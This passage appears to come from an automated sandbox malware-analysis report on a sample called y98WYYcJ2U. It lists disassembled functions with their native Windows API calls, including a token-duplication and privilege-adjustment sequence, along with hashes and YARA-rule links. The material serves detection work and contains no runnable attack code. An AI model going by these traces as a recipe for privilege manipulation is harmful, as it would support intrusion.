_vsnprintf.210A(?,-00000081,?,?,0000000A,7268C327), ref: 726A5604
ZwWow64DebuggerCall.210A(00000001,00000000,7FFE02D4,?,7268C327,7271F198,00000090,7264B0FE,00000003,7268C327,0000000A,00000001,00000000,0000000A,7268C327,Invalid parameter passed to C runtime function.), ref: 726A56DD

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CallDebugDebuggerFilterQueryStateWow64_alloca_probe_16_vsnprintfmemcpy
String ID:
API String ID: 1346858437-0
Opcode ID: 736a52fcb26aba09380991a5d1dbf96adc415015c4483f12b51b85dd2b9ecbfd
Instruction ID: 746e6cb5d3d4d71fd1eb1187532b9384436cf7b480f637ea44af4e4d2d17f8b6
Opcode Fuzzy Hash: 736a52fcb26aba09380991a5d1dbf96adc415015c4483f12b51b85dd2b9ecbfd
Instruction Fuzzy Hash: DB51A271D002598FDB26CF6CC9647AEBBB1AF04714F2041AED85AAB2E9D7744D42CF90

Uniqueness

Uniqueness Score: -1.00%

Function 7264F3E0, Relevance: 9.1, APIs: 6, Instructions: 122nativeCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.210A(7273861C,7271F238,0000001C,7264E942,?,00000000,727352D8), ref: 7264F400
ZwUnmapViewOfSection.210A(000000FF,?,7273861C,7271F238,0000001C,7264E942,?,00000000,727352D8), ref: 7264F48F
ZwClose.210A(?,000000FF,?,7273861C,7271F238,0000001C,7264E942,?,00000000,727352D8), ref: 7264F49D

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: AcquireCloseExclusiveLockSectionUnmapView
String ID:
API String ID: 1629747488-0
Opcode ID: 5b9c825cdbea089f9bbd29c7249c0f0be4a0f005a397cded1ba200380fd5fb7c
Instruction ID: 6548f2016847f712a186bb613077cd452e5e847392a112f9ef1683e92d54aa0f
Opcode Fuzzy Hash: 5b9c825cdbea089f9bbd29c7249c0f0be4a0f005a397cded1ba200380fd5fb7c
Instruction Fuzzy Hash: 6C41AA32944245CFCF06DF6EC95079A7BB1BF04354F91551AD842AB2D7CB34CA11CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 72685322, Relevance: 9.1, APIs: 6, Instructions: 121nativethreadCOMMON

Download Yara Rule

APIs

ZwOpenProcessTokenEx.210A(000000FF,00000002,00000000,?,7271FE60,00000064,7266C97D,?), ref: 726BE983
ZwDuplicateToken.210A(?,00000024,00000018,00000000,00000002,?,000000FF,00000002,00000000,?,7271FE60,00000064,7266C97D,?), ref: 726BE9BE
ZwSetInformationObject.210A(?,00000004,?,00000002,?,00000024,00000018,00000000,00000002,?,000000FF,00000002,00000000,?,7271FE60,00000064), ref: 726BE9E6
ZwSetInformationThread.210A(000000FE,00000005,?,00000004,?,00000004,?,00000002,?,00000024,00000018,00000000,00000002,?,000000FF,00000002), ref: 726BEA00
ZwAdjustPrivilegesToken.210A(?,00000000,00000001,00000010,00000000,00000000,000000FE,00000005,?,00000004,?,00000004,?,00000002,?,00000024), ref: 726BEA38
ZwSetInformationThread.210A(000000FE,00000012,00000001,00000004,?,00000000,00000001,00000010,00000000,00000000,000000FE,00000005,?,00000004,?,00000004), ref: 726BEA52

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: InformationToken$Thread$AdjustDuplicateObjectOpenPrivilegesProcess
String ID:
API String ID: 1965722618-0
Opcode ID: 6ef8fe2fcdf8d14304c2d091bc52e43ccd2885885845dccf1d81104727b61fc5
Instruction ID: ae65a5eaab23163bf72df20a54f746caecfde58fb788fb5de747ed7be29a5adc
Opcode Fuzzy Hash: 6ef8fe2fcdf8d14304c2d091bc52e43ccd2885885845dccf1d81104727b61fc5
Instruction Fuzzy Hash: C141E6B0D01358EEEB11CFE9C984BDDBFB8BF08714F60412AE614AB290D7B48A45DB55

Uniqueness

Uniqueness Score: -1.00%

Function 72648436, Relevance: 9.1, APIs: 6, Instructions: 102memorylibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 7267BCC9: LdrControlFlowGuardEnforced.210A(?,?,?,72648448,?,?,?,?,72648432,00000000), ref: 7267BCD0

RtlQueryProtectedPolicy.210A(72624704,?,?,?,?,?,72648432,00000000), ref: 72648459

Part of subcall function 72648530: RtlAcquireSRWLockShared.210A(72738650,?,?,?,7264845E,72624704,?,?,?,?,?,72648432,00000000), ref: 7264854B
Part of subcall function 72648530: bsearch.210A(?,00000014,7264A820,72738650,?,?,?,7264845E,72624704,?,?,?,?,?,72648432,00000000), ref: 72648566
Part of subcall function 72648530: RtlReleaseSRWLockShared.210A(72738650), ref: 72648573

Part of subcall function 7268681F: LdrControlFlowGuardEnforced.210A(?,?,?,7264846D,72624704,?,?,?,?,?,72648432,00000000), ref: 72686826

LdrControlFlowGuardEnforced.210A(72624704,?,?,?,?,?,72648432,00000000), ref: 7264846D
RtlAllocateHeap.210A(00000000,00000000,00000010,?,72624704,?,?,?,?,?,72648432,00000000), ref: 72648489
RtlEncodePointer.210A(?,?,00000000,00000010,?,72624704,?,?,?,?,?,72648432,00000000), ref: 7264849D
RtlAcquireSRWLockExclusive.210A(-7273B32B,00000000,?,?,00000000,00000010,?,72624704,?,?,?,?,?,72648432,00000000), ref: 726484BB
RtlReleaseSRWLockExclusive.210A(-7273B32B,-7273B32B,00000000,?,?,00000000,00000010,?,72624704,?,?,?,?,?,72648432,00000000), ref: 726484F4

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Lock$ControlEnforcedFlowGuard$AcquireExclusiveReleaseShared$AllocateEncodeHeapPointerPolicyProtectedQuerybsearch
String ID:
API String ID: 3913980568-0
Opcode ID: 52804ec894152dc65a90a638f148a6fe3c4185f6afb65a3b00c9c2907c8e48fc
Instruction ID: 4c5fb2ee8b7a59803829e3522abfcf741f1b183414591348d59be582cf4240c8
Opcode Fuzzy Hash: 52804ec894152dc65a90a638f148a6fe3c4185f6afb65a3b00c9c2907c8e48fc
Instruction Fuzzy Hash: 0E319AB0540241EFC72A9F6DC940B56BFFAEF41B50F10A46BE5858B6D0EBB4DA40CB94

Uniqueness

Uniqueness Score: -1.00%

Function 726C5023, Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A(00000000,00000002,?,726BDB3A,7271FDC0,0000000C,726B9436,00000000,00000000,00000001,?,?,7FFE0386,?,72646748,00000001), ref: 726C5028
RtlGetCurrentServiceSessionId.210A ref: 726C5061
RtlTryEnterCriticalSection.210A(72735350,00000000,00000002,?,726BDB3A,7271FDC0,0000000C,726B9436,00000000,00000000,00000001,?,?,7FFE0386,?,72646748), ref: 726C509B
RtlGetCurrentServiceSessionId.210A(72735350,00000000,00000002,?,726BDB3A,7271FDC0,0000000C,726B9436,00000000,00000000,00000001,?,?,7FFE0386,?,72646748), ref: 726C50A2
RtlGetCurrentServiceSessionId.210A ref: 726C50D2
RtlGetCurrentServiceSessionId.210A ref: 726C512F

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentServiceSession$CriticalEnterSection
String ID:
API String ID: 1555030633-0
Opcode ID: e2f639da0c6b90c6764224c3b15c531c1c03d74af4c7a9f8516ea914ed570173
Instruction ID: ac58dc77d3a057dcd27b75b195c19f435ce3f1546ac0ce1e27debf29945df832
Opcode Fuzzy Hash: e2f639da0c6b90c6764224c3b15c531c1c03d74af4c7a9f8516ea914ed570173
Instruction Fuzzy Hash: 2631BD313457C19BE712676CCE48B353BA4EB41778F250392E922EB7E6D768E480C255

Uniqueness

Uniqueness Score: -1.00%

Function 726C660A, Relevance: 9.1, APIs: 6, Instructions: 79memorynativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A(00000000,?,?,00000000,00000000,?,726B95C7,?,?,00000000,00000000,7FFE0385,?,?,72656EAA,?), ref: 726C661C
RtlAllocateHeap.210A(?,?,?,00000000,?,?,00000000,00000000,?,726B95C7,?,?,00000000,00000000,7FFE0385,?), ref: 726C6660
memcpy.210A(0000002C,?,00000000,?,00000000,?,?,00000000,00000000,?,726B95C7,?,?,00000000,00000000,7FFE0385), ref: 726C6694
RtlGetCurrentServiceSessionId.210A(00000000,00000000,?,?,00000000,?), ref: 726C66AB
ZwTraceEvent.210A(00000000,00000402,00000000,00000000,00000000,00000000,?,?,00000000,?), ref: 726C66D1
RtlFreeHeap.210A(?,00000000,00000000,00000000,00000402,00000000,00000000,00000000,00000000,?,?,00000000,?), ref: 726C66E2

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CurrentHeapServiceSession$AllocateEventFreeTracememcpy
String ID:
API String ID: 1866349635-0
Opcode ID: af400a68ca8143030ba395448e1210cac2f4a6b82491a7c2be14a3151d62c2a0
Instruction ID: 2b7cbcddf4741abe4ace5cc351609a83c2c094550bb55cc1562bd282e8bae396
Opcode Fuzzy Hash: af400a68ca8143030ba395448e1210cac2f4a6b82491a7c2be14a3151d62c2a0
Instruction Fuzzy Hash: B6219771A00644AFC711EF6DC940F6ABBB8FF88704F20006AF905DB691D635ED50CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 726C66F0, Relevance: 9.1, APIs: 6, Instructions: 74COMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.210A(?,00000000,00000001,?,?,7269EFB3,00000000,000014C0,00000000,00000000,?), ref: 726C6712
RtlGetCurrentServiceSessionId.210A(?,00000000,00000001,?,?,7269EFB3,00000000,000014C0,00000000,00000000,?), ref: 726C6748
RtlCreateUnicodeString.210A(?,?,?,00000000,00000001,?,?,7269EFB3,00000000,000014C0,00000000,00000000,?), ref: 726C677A
RtlCreateUnicodeString.210A(?,00000000,?,?,?,00000000,00000001,?,?,7269EFB3,00000000,000014C0,00000000,00000000,?), ref: 726C6789
RtlFreeUnicodeString.210A(?,?,00000000,?,00000000,?,?,?,00000000,00000001,?,?,7269EFB3,00000000,000014C0,00000000), ref: 726C67B1
RtlFreeUnicodeString.210A(00000000,?,00000000,?,?,?,00000000,00000001,?,?,7269EFB3,00000000,000014C0,00000000,00000000,?), ref: 726C67BB

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: StringUnicode$CreateCurrentFreeServiceSession
String ID:
API String ID: 2037290490-0
Opcode ID: aa9910a49bbe0af9c2750020f946bdc7ffd6d99ee7d1fab601d296af78cbb08b
Instruction ID: d1b22b3a69dca4bd98c7da9290c81a0bbebf6c0262e66e672ab1e2da9cd5b4b1
Opcode Fuzzy Hash: aa9910a49bbe0af9c2750020f946bdc7ffd6d99ee7d1fab601d296af78cbb08b
Instruction Fuzzy Hash: 9321A1725047419BC302EF6DCA44B6BBBEDEFC1744F00086BA942D72D1E734E949C6AA

Uniqueness

Uniqueness Score: -1.00%

Function 7264C700, Relevance: 9.1, APIs: 6, Instructions: 70COMMON

Download Yara Rule

APIs

RtlUpcaseUnicodeString.210A(?,?,00000001), ref: 7264C744
A_SHAInit.210A(?,?,?,00000001), ref: 7264C751
A_SHAUpdate.210A(?,?,?,?,?,?,00000001), ref: 7264C762

Part of subcall function 7264C890: memcpy.210A(00000040,?,00000040,?,?,?,?,?,?,00000001), ref: 7264C8E0
Part of subcall function 7264C890: RtlDebugPrintTimes.210A(00000041,00000001,?,?,?,?,?,?,00000001), ref: 7264C906
Part of subcall function 7264C890: memcpy.210A(?,?,?,?,?,?,?,?,00000001), ref: 7264C92B

A_SHAFinal.210A(?,?,?,?,?,?,?,?,00000001), ref: 7264C76F

Part of subcall function 7264C7D0: memset.210A(?,00000000,-00000008,?,?), ref: 7264C80A
Part of subcall function 7264C7D0: A_SHAUpdate.210A(00000001,00000080,00000000,00000002,?,?), ref: 7264C842
Part of subcall function 7264C7D0: memset.210A(00000001,00000000,00000040,00000005,00000001,00000080,00000000,00000002,?,?), ref: 7264C859
Part of subcall function 7264C7D0: A_SHAInit.210A(00000001,00000080,00000000,00000002,?,?), ref: 7264C862

RtlFreeUnicodeString.210A(?,?,?,?,?,?,?,?,?,00000001), ref: 7264C778

Part of subcall function 72662050: RtlDeleteBoundaryDescriptor.210A(00000000,00000000,?,7265948C,00000000,?,?,00000000,00000000,\REGISTRY\USER\,?,00020019,?,?,000000FA,00000001), ref: 72662062

RtlInitializeSid.210A(?,726256D8,00000006,?,?,?,?,?,?,?,?,?,00000001), ref: 7264C785

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: InitStringUnicodeUpdatememcpymemset$BoundaryDebugDeleteDescriptorFinalFreeInitializePrintTimesUpcase
String ID:
API String ID: 2298431899-0
Opcode ID: 0520d6f4f4ffc7932d2c81e20d5e2141f66f18d24eb8c810c0b2d3ff166d46be
Instruction ID: 028e45973826001bcb0be023d4132e7a4d58278f61d0d413abc3e99e9ff5e5b8
Opcode Fuzzy Hash: 0520d6f4f4ffc7932d2c81e20d5e2141f66f18d24eb8c810c0b2d3ff166d46be
Instruction Fuzzy Hash: E2211D75A006099FDB20CFADC544E9EBBF9AF48704F20451BE951E7380DB35EA448F95

Uniqueness

Uniqueness Score: -1.00%

Function 004159E0, Relevance: 9.1, APIs: 6, Instructions: 66COMMON

Download Yara Rule

APIs

_hread.KERNEL32(00000000,00000000,00000000), ref: 00415A03
EnumDateFormatsA.KERNEL32(00000000,00000000,00000000), ref: 00415A1B
_llseek.KERNEL32(00000000,00000000,00000000), ref: 00415A27
RtlEnterCriticalSection.NTDLL(?), ref: 00415A31
VirtualLock.KERNEL32(00000000,00000000), ref: 00415A7C
LoadResource.KERNEL32(00000000,00000000), ref: 00415A92

Memory Dump Source

Source File: 00000000.00000002.1330033651.000000000040A000.00000020.00020000.sdmp, Offset: 0040A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40a000_y98WYYcJ2U.jbxd

Similarity

API ID: CriticalDateEnterEnumFormatsLoadLockResourceSectionVirtual_hread_llseek
String ID:
API String ID: 716112014-0
Opcode ID: d73357970d8e52bf0b76774217c3bc015d6948a80aa16369de9650dd31c9de5d
Instruction ID: 66d5b44642d519e386ca4c2ef5b01c2ce25578faaf9439f890406535b7074e73
Opcode Fuzzy Hash: d73357970d8e52bf0b76774217c3bc015d6948a80aa16369de9650dd31c9de5d
Instruction Fuzzy Hash: 5C219031E82204EFD760DFA4DD46FFE7BB4AB94701F114126E208A61D0D77499448B6D

Uniqueness

Uniqueness Score: -1.00%

Function 7266D121, Relevance: 9.1, APIs: 6, Instructions: 51nativethreadmemoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.210A(?,?,?,7266CFF5,?,?), ref: 7266D165
ZwSetInformationThread.210A(000000FE,00000005,?,00000004,7266CFF5,?,?), ref: 726B2251
ZwSetInformationThread.210A(000000FE,00000012,00000000,00000004,000000FE,00000005,?,00000004,7266CFF5,?,?), ref: 726B226D
ZwSetInformationObject.210A(?,00000004,?,00000002,000000FE,00000012,00000000,00000004,000000FE,00000005,?,00000004,7266CFF5,?,?), ref: 726B228C
ZwClose.210A(?,?,00000004,?,00000002,000000FE,00000012,00000000,00000004,000000FE,00000005,?,00000004,7266CFF5,?,?), ref: 726B2297
ZwSetInformationThread.210A(000000FE,00000005,00000000,00000004,?,?,00000004,?,00000002,000000FE,00000012,00000000,00000004,000000FE,00000005,?), ref: 726B22B3

Part of subcall function 7268713B: RtlFreeHeap.210A(?,?,00000000,7266D140,7266CFF5,?,?), ref: 72687158

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Information$Thread$FreeHeap$CloseObject
String ID:
API String ID: 3384099265-0
Opcode ID: 35c3a0462a8c832d37451e25b8ccadb0d25244a52210833e1506a8708f829237
Instruction ID: 001c2ec07bdd0a18206805a0bd358344d2db6c2566ae245adfd8ab7b1177b07d
Opcode Fuzzy Hash: 35c3a0462a8c832d37451e25b8ccadb0d25244a52210833e1506a8708f829237
Instruction Fuzzy Hash: 3A11A070941228ABDB26CB68CD51FE97678AF08720F1001D6A725A61E0D3B59E91CF89

Uniqueness

Uniqueness Score: -1.00%

Function 72642630, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 159memorylibraryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.210A(?,00000000,00000048,7271EDB0,0000006C), ref: 7264269E
RtlQueryInformationActivationContext.210A(00000001,00000000,00000000,00000001,?,00000008,00000000,?,?,?,?,00000000,00000048,7271EDB0,0000006C), ref: 72642708

Part of subcall function 7265CD70: RtlAcquireSRWLockShared.210A(72738654,?,FFFFFFFE), ref: 7265CDBE

LdrAddRefDll.210A(00000000,?,00000003), ref: 726427D7
RtlReleaseActivationContext.210A(?,?,?,00000001,00000000,00000000,00000001,?,00000008,00000000,?,?,?,?,00000000,00000048), ref: 72642842

Strings

(, xrefs: 7264277B

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ActivationContext$AcquireAllocateHeapInformationLockQueryReleaseShared
String ID: (
API String ID: 4009083182-3887548279
Opcode ID: 6690764e4f4119b116fc6853f289488d606ba9ebb3cfaa85d4a36751da350f04
Instruction ID: b0d492e63c11969e014327d61731f7a8ab656d8384db72518204ac758ca011e0
Opcode Fuzzy Hash: 6690764e4f4119b116fc6853f289488d606ba9ebb3cfaa85d4a36751da350f04
Instruction Fuzzy Hash: F76148B0D00749CFDB12CFA9C940ADEBBF2FF49314F20416AD855AB291DB719A45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 72644459, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 129COMMON

Download Yara Rule

Strings

0, xrefs: 726444C3
Flst, xrefs: 72644496

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID:
String ID: 0$Flst
API String ID: 0-758220159
Opcode ID: bfe30eaf201704ed2b6c0c6e317e2682b726d7d462b8932218f9e8bae95c1ce7
Instruction ID: 59f15e374eb19752dc18c4be996b560f610d5059457fc247c9970ce77b2ff1d7
Opcode Fuzzy Hash: bfe30eaf201704ed2b6c0c6e317e2682b726d7d462b8932218f9e8bae95c1ce7
Instruction Fuzzy Hash: C64156B1E00648CBDB19CF99C58179DFBF6EF44708F64946BD08A9B284DB319A46CB80

Uniqueness

Uniqueness Score: -1.00%

Function 7264D526, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 112nativeCOMMON

Download Yara Rule

APIs

RtlInitUnicodeString.210A(?,\Registry\Machine\System\CurrentControlSet\Control\MUI\UILanguages\PendingDelete,00000000,?), ref: 7264D580
ZwOpenKey.210A(?,00020019,?,?,\Registry\Machine\System\CurrentControlSet\Control\MUI\UILanguages\PendingDelete,00000000,?), ref: 7264D5D0

Part of subcall function 7268A300: LdrInitializeThunk.NTDLL(7264E062,?,?,?,?,00020019,00000018,?,?,?,?,\Registry\Machine\Software\Policies\Microsoft\MUI\Settings,00000000), ref: 7268A30A

ZwEnumerateKey.210A(?,00000000,00000000,?,00000200,?,?,00020019,?,?,\Registry\Machine\System\CurrentControlSet\Control\MUI\UILanguages\PendingDelete,00000000,?), ref: 726A5EAD
ZwClose.210A(00000000,?,00000000,00000000,?,00000200,?,?,00020019,?,?,\Registry\Machine\System\CurrentControlSet\Control\MUI\UILanguages\PendingDelete,00000000,?), ref: 726A5F53

Strings

\Registry\Machine\System\CurrentControlSet\Control\MUI\UILanguages\PendingDelete, xrefs: 7264D574

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CloseEnumerateInitInitializeOpenStringThunkUnicode
String ID: \Registry\Machine\System\CurrentControlSet\Control\MUI\UILanguages\PendingDelete
API String ID: 1553249520-991696866
Opcode ID: d677ed80611baddea5fdf0bb6f3f5f63f1f524ca44c0489779d4893c1eeb02b7
Instruction ID: c40a4c43ebf0f0f6e15dc42e9a00b760898842a2dc4ff2a1a2077bd1ee4e6827
Opcode Fuzzy Hash: d677ed80611baddea5fdf0bb6f3f5f63f1f524ca44c0489779d4893c1eeb02b7
Instruction Fuzzy Hash: 8B418570D112199BDB24DF68DC88BD9B7B8EF08314F5042EAA909D7290DB74DE80CF55

Uniqueness

Uniqueness Score: -1.00%

Function 726C3284, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 95memorynativeCOMMON

Download Yara Rule

APIs

ZwQueryValueKey.210A(?,00000000,00000002,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 726C32BF
RtlAllocateHeap.210A(?,00000008,00000000,?,00000000,00000002,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 726C32E5
ZwQueryValueKey.210A(00000000,00000000,00000002,00000000,00000000,00000000,00000008,00000000,?,00000000,00000002,00000000,00000000,00000000,?,00000000), ref: 726C3306
RtlFreeHeap.210A(?,00000000,00000000,?,00000000,00000002,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 726C3361

Strings

BinaryName, xrefs: 726C32B4

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: HeapQueryValue$AllocateFree
String ID: BinaryName
API String ID: 4267586637-215506332
Opcode ID: 171a8032a35c88c56310c736a8d155f70b3cd12c2cdd6049926001d2b646ad74
Instruction ID: 704609ef2cca11ccede5dcfff6183c2697df96f45ba828fa13519b867a3aaaab
Opcode Fuzzy Hash: 171a8032a35c88c56310c736a8d155f70b3cd12c2cdd6049926001d2b646ad74
Instruction Fuzzy Hash: BE310832900559EFDB16EB5CC941EAFBB75FB81710F01416AE90AA72C0DB31EE60C790

Uniqueness

Uniqueness Score: -1.00%

Function 726CE460, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.210A(727370A0,-00000054,?,00000000,-00000054,?,726A69A3), ref: 726CE492
DbgPrint.210A(AVRF: AVrfDllUnloadNotification called for a provider (%p) ,-00000054,727370A0,-00000054,?,00000000,-00000054,?,726A69A3), ref: 726CE4A9
RtlLeaveCriticalSection.210A(727370A0,727370A0,-00000054,?,00000000,-00000054,?,726A69A3), ref: 726CE4F0

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 726CE4A4

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: CriticalSection$EnterLeavePrint
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 1203512206-702105204
Opcode ID: 69469c18e3c22902523727e994083bb4e08248e66f64ed78abb3dc8930e2cb4e
Instruction ID: 6d4484ef35822853f1e58e91469c43d73fe2c8893371fdf6cccf72cd520fbccf
Opcode Fuzzy Hash: 69469c18e3c22902523727e994083bb4e08248e66f64ed78abb3dc8930e2cb4e
Instruction Fuzzy Hash: 6A1102362006899BD726EE5EDA80B5A7BB6FB49714B10411EE8430B5C2CB30FC81D694

Uniqueness

Uniqueness Score: -1.00%

Function 72677110, Relevance: 7.9, APIs: 5, Instructions: 368COMMON

Download Yara Rule

APIs

